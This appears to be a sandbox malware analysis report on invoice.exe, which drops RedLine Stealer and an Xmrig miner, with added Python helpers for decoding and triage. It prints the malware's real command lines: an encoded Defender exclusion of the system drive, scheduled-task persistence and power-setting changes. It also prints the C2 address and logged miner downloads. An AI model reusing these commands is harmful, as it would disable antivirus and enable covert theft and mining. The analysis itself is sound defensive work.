
Windows Analysis Report
invoice.exe

Overview

General Information

Sample name: invoice.exe
Analysis ID: 1504580
MD5: 6af6a7fac1197a9b12b28c0e4db8c18a
SHA1: 357ae7d706de393d8743dbbe0d94bc87922643cf
SHA256: d0a2035c0431796c138a26d1c9a75142b613c5417dc96a9200723870d0b3a687

Detection

MinerDownloader, RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected AntiVM3
Yara detected Generic MinerDownloader
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • invoice.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 6AF6A7FAC1197A9B12B28C0E4DB8C18A)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5100 cmdline: C:\Windows\system32\cmd.exe /c dir /b "*.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • 4usfliof.exe (PID: 4520 cmdline: "4usfliof.exe" MD5: B154114F2D13496DC9630CAC4E707672)
        • RegSvcs.exe (PID: 732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • WerFault.exe (PID: 6604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • yee9mbi69cm7.exe (PID: 5744 cmdline: "yee9mbi69cm7.exe" MD5: D076D83093CF70D43AE8202CB9603D0D)
        • RegSvcs.exe (PID: 5664 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 5100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AppLaunch.exe (PID: 104280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)
            • cmd.exe (PID: 104356 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 104372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 104400 cmdline: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • WmiPrvSE.exe (PID: 7200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • cmd.exe (PID: 7276 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7368 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 7296 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7400 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • WerFault.exe (PID: 5432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Extracted RedLine configuration:
{"C2 url": "135.181.7.171:81", "Bot Id": "_\u0416", "Authorization Header": "101013a5e99e0857595aae297a11351d"}
Source | Rule | Description | Author
C:\ProgramData\HostData\logs.uce | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author
0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_MinerDownloader_3 | Yara detected Generic MinerDownloader | Joe Security
0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp | JoeSecurity_MinerDownloader_3 | Yara detected Generic MinerDownloader | Joe Security
(5 of 12 entries shown)

                  System Summary

Source: File created
Rule author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ProcessId: 104280, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe

Source: Process started
Rule author: Florian Roth (Nextron Systems)
CommandLine (also reported as Command and ProcessCommandLine): "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Image (also NewProcessName and OriginalFileName): C:\Windows\SysWOW64\cmd.exe
ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
ParentProcessId: 104280 (AppLaunch.exe)
ProcessId: 104356 (cmd.exe)

Source: Process started (two Sigma rules matched the same event)
Rule authors: frack113; Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
CommandLine (also reported as Command and ProcessCommandLine): powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
CommandLine|base64offset|contains: ^
Image (also NewProcessName and OriginalFileName): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: the cmd.exe command line of ProcessId 104356 listed above
ParentImage: C:\Windows\SysWOW64\cmd.exe
ParentProcessId: 104356 (cmd.exe)
ProcessId: 104400 (powershell.exe)

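The -EncodedCommand value in the Sigma hits above is base64 of the UTF-16LE script, and the operator has padded the script with PowerShell block comments (<# ... #>) so that plain-text matches on the cmdlet name fail. Decoded and with the padding removed it reads: Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the whole system drive and the user profile from Microsoft Defender scanning. The powercfg calls in the same cmd.exe line then turn off standby and hibernation so the host stays awake for the miner. The Python below is an added triage helper, not part of the Joe Sandbox report; the command line is copied verbatim from the process tree, while the regexes and the finding labels are this example's own choices.

```python
import base64
import re

# Constructed input: the cmd.exe command line from the sandbox process tree (PID 104356).
SAMPLE_CMDLINE = (
    '"cmd.exe" /C powershell -EncodedCommand "'
    'PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAj'
    'AHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUA'
    'cwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAg'
    'ADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A'
    '" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0'
    ' & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0'
    ' & powercfg /hibernate off'
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_RE = re.compile(r'-(?:encodedcommand|enc|ec|e)\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)
BLOCK_COMMENT_RE = re.compile(r'<#.*?#>', re.DOTALL)
# powercfg invocations that stop the machine from sleeping or hibernating.
POWERCFG_RE = re.compile(
    r'powercfg\s+(?:/hibernate\s+off|/x\s+-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0)',
    re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def strip_block_comments(script):
    """Drop <# ... #> comments (here pure signature-breaking padding) and collapse whitespace."""
    return ' '.join(BLOCK_COMMENT_RE.sub(' ', script).split())


def triage(cmdline):
    """Flag Defender-exclusion and power-setting tampering in one process command line."""
    findings = []
    script = decode_encoded_command(cmdline)
    cleaned = strip_block_comments(script) if script is not None else None
    if cleaned:
        if re.search(r'\bAdd-MpPreference\b', cleaned, re.I) and re.search(r'-ExclusionPath\b', cleaned, re.I):
            findings.append('defender_exclusion_added')
            if re.search(r'\$env:SystemDrive', cleaned, re.I):
                findings.append('exclusion_covers_system_drive')
        if re.search(r'\bSet-MpPreference\b.*-Disable\w*Monitoring', cleaned, re.I):
            findings.append('defender_feature_disabled')
    if POWERCFG_RE.search(cmdline):
        findings.append('sleep_and_hibernate_disabled')
    return {'decoded_script': script, 'cleaned_script': cleaned, 'findings': findings}


if __name__ == '__main__':
    result = triage(SAMPLE_CMDLINE)
    print(result['cleaned_script'])
    print(result['findings'])
```

The decoder is only as good as its regex: run it over the ParentCommandLine field as well as CommandLine, since here the encoded string first appears in the cmd.exe parent and only later in the powershell.exe child.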
                  Persistence and Installation Behavior

Source: Process started
Rule author: Joe Security
CommandLine (also reported as Command and ProcessCommandLine): "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Image (also NewProcessName and OriginalFileName): C:\Windows\SysWOW64\cmd.exe
ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
ParentProcessId: 104280 (AppLaunch.exe)
ProcessId: 7276 (cmd.exe)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T01:45:44.734072+0200 | 2829056 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49739 | 140.82.121.3 | 443 | TCP
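The two SCHTASKS /CREATE lines in the process tree register the same dropped binary, C:\ProgramData\Dllhost\dllhost.exe, twice: every 5 minutes as a task named "dllhost", and hourly under a vendor-looking task folder "NvStray\NvStrayService_bk9049". The real dllhost.exe ships in C:\Windows\System32, which is why the Sigma rule "Files With System Process Name In Unsuspected Locations" also fires on the dropped copy. The Python below is an added example, not from the report, that parses such command lines and applies those checks; the two sample lines are copied from the process tree, while the directory and binary-name lists, the interval threshold and the finding labels are this example's own.

```python
import re

# Constructed input: the two SCHTASKS command lines from the sandbox process tree.
SAMPLE_TASKS = [
    r'"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
    r'SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"',
]

# Binaries whose genuine copies live under C:\Windows; a task launching a same-named file
# from a user-writable directory is the pattern the Sigma rule above looks for.
SYSTEM_BINARY_NAMES = {
    'dllhost.exe', 'svchost.exe', 'conhost.exe', 'lsass.exe', 'csrss.exe',
    'winlogon.exe', 'explorer.exe', 'rundll32.exe', 'taskhostw.exe',
}
LEGIT_DIRS = ('c:\\windows\\', 'c:\\program files\\', 'c:\\program files (x86)\\')
SUSPECT_DIRS = ('c:\\programdata\\', '\\appdata\\', '\\temp\\', 'c:\\users\\public\\')

# /SWITCH followed by an optional value, which is either quoted or a single token
# and must not itself be the next switch.
ARG_RE = re.compile(r'/(\w+)(?:\s+(?!/)(?:"([^"]*)"|(\S+)))?')


def parse_schtasks(cmdline):
    """Return the SCHTASKS switches as a dict (value None for flags), or None if not a schtasks call."""
    idx = cmdline.lower().find('schtasks')
    if idx < 0:
        return None
    args = {}
    for m in ARG_RE.finditer(cmdline[idx:]):
        value = m.group(2) if m.group(2) is not None else m.group(3)
        args[m.group(1).upper()] = value
    return args


def interval_minutes(args):
    """Trigger period in minutes for the /SC and /MO combination, or None if not periodic."""
    unit = {'MINUTE': 1, 'HOURLY': 60, 'DAILY': 1440}.get((args.get('SC') or '').upper())
    if unit is None:
        return None
    return unit * int(args.get('MO') or 1)


def assess_task(cmdline):
    """Parse a SCHTASKS /CREATE command line and return persistence-related findings."""
    args = parse_schtasks(cmdline)
    if args is None or 'CREATE' not in args:
        return None
    name = args.get('TN') or ''
    action = args.get('TR') or ''
    path = action.lower()
    exe = path.rsplit('\\', 1)[-1]
    findings = []
    if exe in SYSTEM_BINARY_NAMES and not path.startswith(LEGIT_DIRS):
        findings.append('system_binary_name_outside_windows')
    if any(d in path for d in SUSPECT_DIRS):
        findings.append('action_in_user_writable_dir')
    minutes = interval_minutes(args)
    if minutes is not None and minutes <= 60:
        findings.append('high_frequency_trigger')
    if '\\' in name:
        findings.append('task_in_subfolder')   # vendor-looking folder names help the task blend in
    if (args.get('RU') or '').upper() == 'SYSTEM':
        findings.append('runs_as_system')
    return {'name': name, 'action': action, 'interval_minutes': minutes, 'findings': findings}


if __name__ == '__main__':
    for line in SAMPLE_TASKS:
        print(assess_task(line))
```

On a live host the same checks can be fed from the output of `schtasks /query /fo CSV /v`, whose "Task To Run" column corresponds to the /TR value parsed here.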


                  AV Detection

Source: invoice.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Avira: detection malicious, Label: HEUR/AGEN.1317024
Source: 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "135.181.7.171:81", "Bot Id": "_\u0416", "Authorization Header": "101013a5e99e0857595aae297a11351d"}
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | ReversingLabs: Detection: 87%
Source: invoice.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe | Joe Sandbox ML: detected
Source: invoice.exe | Joe Sandbox ML: detected

                  Bitcoin Miner

Source: Yara match | File source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5100, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 104280, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\HostData\logs.uce, type: DROPPED
Source: invoice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: invoice.exe
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb | source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb | source: RegSvcs.exe, 00000006.00000002.2894124210.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb | source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb3> | source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb2 | source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ServiceModel.pdb | source: RegSvcs.exe, 00000006.00000002.2889790802.000000000089D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb | source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
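The static PE lines above (EXECUTABLE_IMAGE and 32BIT_MACHINE in the COFF Characteristics; DYNAMIC_BASE, NX_COMPAT, GUARD_CF and TERMINAL_SERVER_AWARE in the optional header's DllCharacteristics; the "non-standard section names" signature) come straight from the PE headers and are cheap to reproduce without running the sample. The Python below is an added example, not part of the Joe Sandbox report: a header parser plus a builder for a constructed, non-loadable PE32 header blob used to exercise it. The flag values mirror what the report lists for invoice.exe, but the section names and every other field in the blob are constructed for the example, not read from the real file.

```python
import struct

# Flag names from winnt.h (IMAGE_FILE_* and IMAGE_DLLCHARACTERISTICS_*).
MACHINES = {0x14C: 'I386', 0x8664: 'AMD64', 0x1C4: 'ARMNT', 0xAA64: 'ARM64'}
FILE_CHARACTERISTICS = {
    0x0001: 'RELOCS_STRIPPED', 0x0002: 'EXECUTABLE_IMAGE', 0x0020: 'LARGE_ADDRESS_AWARE',
    0x0100: '32BIT_MACHINE', 0x0200: 'DEBUG_STRIPPED', 0x2000: 'DLL',
}
DLL_CHARACTERISTICS = {
    0x0020: 'HIGH_ENTROPY_VA', 0x0040: 'DYNAMIC_BASE', 0x0080: 'FORCE_INTEGRITY',
    0x0100: 'NX_COMPAT', 0x0200: 'NO_ISOLATION', 0x0400: 'NO_SEH', 0x0800: 'NO_BIND',
    0x1000: 'APPCONTAINER', 0x2000: 'WDM_DRIVER', 0x4000: 'GUARD_CF', 0x8000: 'TERMINAL_SERVER_AWARE',
}
# Section names emitted by the usual Microsoft/GNU toolchains; anything else is "non-standard".
STANDARD_SECTIONS = {'.text', '.data', '.rdata', '.bss', '.idata', '.edata', '.rsrc',
                     '.reloc', '.tls', '.pdata', '.CRT', '.debug'}


def _flags(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Read the COFF and optional headers of a PE image and report the sandbox's static fields."""
    if data[:2] != b'MZ':
        raise ValueError('no MZ header')
    e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b'PE\x00\x00':
        raise ValueError('no PE signature')
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from('<HHIIIHH', data, coff)
    opt = coff + 20
    magic = struct.unpack_from('<H', data, opt)[0]
    # DllCharacteristics sits at offset 70 in both PE32 (0x10B) and PE32+ (0x20B) optional headers.
    dll_chars = struct.unpack_from('<H', data, opt + 70)[0]
    sec = opt + opt_size
    names = []
    for i in range(nsections):
        raw = data[sec + 40 * i:sec + 40 * i + 8]          # IMAGE_SECTION_HEADER.Name
        names.append(raw.rstrip(b'\x00').decode('ascii', 'replace'))
    return {
        'machine': MACHINES.get(machine, hex(machine)),
        'format': {0x10B: 'PE32', 0x20B: 'PE32+'}.get(magic, hex(magic)),
        'characteristics': _flags(chars, FILE_CHARACTERISTICS),
        'dll_characteristics': _flags(dll_chars, DLL_CHARACTERISTICS),
        'sections': names,
        'non_standard_sections': [n for n in names if n not in STANDARD_SECTIONS],
    }


def parse_pe_file(path):
    with open(path, 'rb') as fh:
        return parse_pe(fh.read())


def build_pe(machine, characteristics, dll_characteristics, section_names):
    """Construct a minimal PE32 header blob (headers only, not loadable) for exercising parse_pe."""
    dos = b'MZ' + b'\x00' * (0x3C - 2) + struct.pack('<I', 0x40)   # e_lfanew -> 0x40
    opt = bytearray(224)                      # PE32 optional header size
    struct.pack_into('<H', opt, 0, 0x10B)     # Magic: PE32
    struct.pack_into('<H', opt, 68, 2)        # Subsystem: WINDOWS_GUI
    struct.pack_into('<H', opt, 70, dll_characteristics)
    coff = struct.pack('<HHIIIHH', machine, len(section_names), 0, 0, 0, len(opt), characteristics)
    sections = b''.join(n.encode('ascii').ljust(8, b'\x00') + b'\x00' * 32 for n in section_names)
    return dos + b'PE\x00\x00' + coff + bytes(opt) + sections


if __name__ == '__main__':
    # Constructed sample: the flag bits the report lists for invoice.exe, with illustrative sections.
    blob = build_pe(0x14C, 0x0002 | 0x0100, 0x0040 | 0x0100 | 0x4000 | 0x8000,
                    ['.text', '.rdata', '.data', '.rsrc', '.reloc', 'XYZ1'])
    print(parse_pe(blob))
```

parse_pe_file() runs the same checks on a real sample; a WinRAR SFX stub like this one is a normal MSVC build, so the hardening flags say nothing about the archive payload it carries.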

                  Networking

Source: Yara match | File source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5100, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 104280, type: MEMORYSTR
Source: Malware configuration extractor | URLs: 135.181.7.171:81
Source: unknown | DNS query: name: pastebin.com
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 135.181.7.171:81
Source: global traffic | HTTP traffic detected: GET /raw/PTNbBX9V HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /S1lentHash/xmrig/raw/main/xmrig.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | IP Address: 140.82.121.3
Source: Joe Sandbox View | IP Address: 135.181.7.171
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
